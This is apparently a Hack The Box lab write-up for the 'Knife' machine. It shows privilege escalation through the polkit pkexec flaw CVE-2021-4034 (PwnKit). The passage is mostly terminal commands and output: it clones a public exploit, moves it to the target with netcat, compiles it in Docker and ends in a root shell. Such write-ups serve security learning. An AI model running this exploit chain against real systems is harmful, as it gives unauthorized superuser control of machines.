CVE-2021-4034
peas discovered that the target system is vulnerable to cve-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.
exploit (pwnkit)
I found an exploit online
┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ git clone https://github.com/berdav/CVE-2021-4034.git ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 4.54 MiB/s, done.
Resolving deltas: 100% (44/44), done.I copied the exploit repo to Kali and packaged it up for delivery
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ nc $IP 2222 < CVE-2021-4034.tar.gz
james@knife:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.2 36410
james@knife:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Delivery complete
james@knife:/dev/shm/CVE-2021-4034$ make
make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc: fatal error: cannot execute ‘cc1’: execvp: No such file or directory
compilation terminated.
make: *** [Makefile:21: pwnkit.so] Error 1Compilation fails. It seems that installed cc has issues with either the library or the compiler itself might be corrupted. Nevertheless, I would need to compile the exploit remotely.
Docker Exploit Development
┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ docker run -it --entrypoint "/bin/bash" --name knife ubuntu:20.04
root@d38364305d8f:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make gitSetting up the environment
root@d38364305d8f:/# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), 22.69 KiB | 1.42 MiB/s, done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.One liner for all
Success
root@d38364305d8f:/# nc 10.10.10.242 2222 < CVE-2021-4034.tar.gz
james@knife:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.2 43254
james@knife:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Delivery complete
james@knife:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
knife
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.242 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:747b prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:747b prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:74:7b txqueuelen 1000 (Ethernet)
RX packets 1069059 bytes 190004928 (190.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1097876 bytes 409563070 (409.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3707691 bytes 422263628 (422.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3707691 bytes 422263628 (422.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise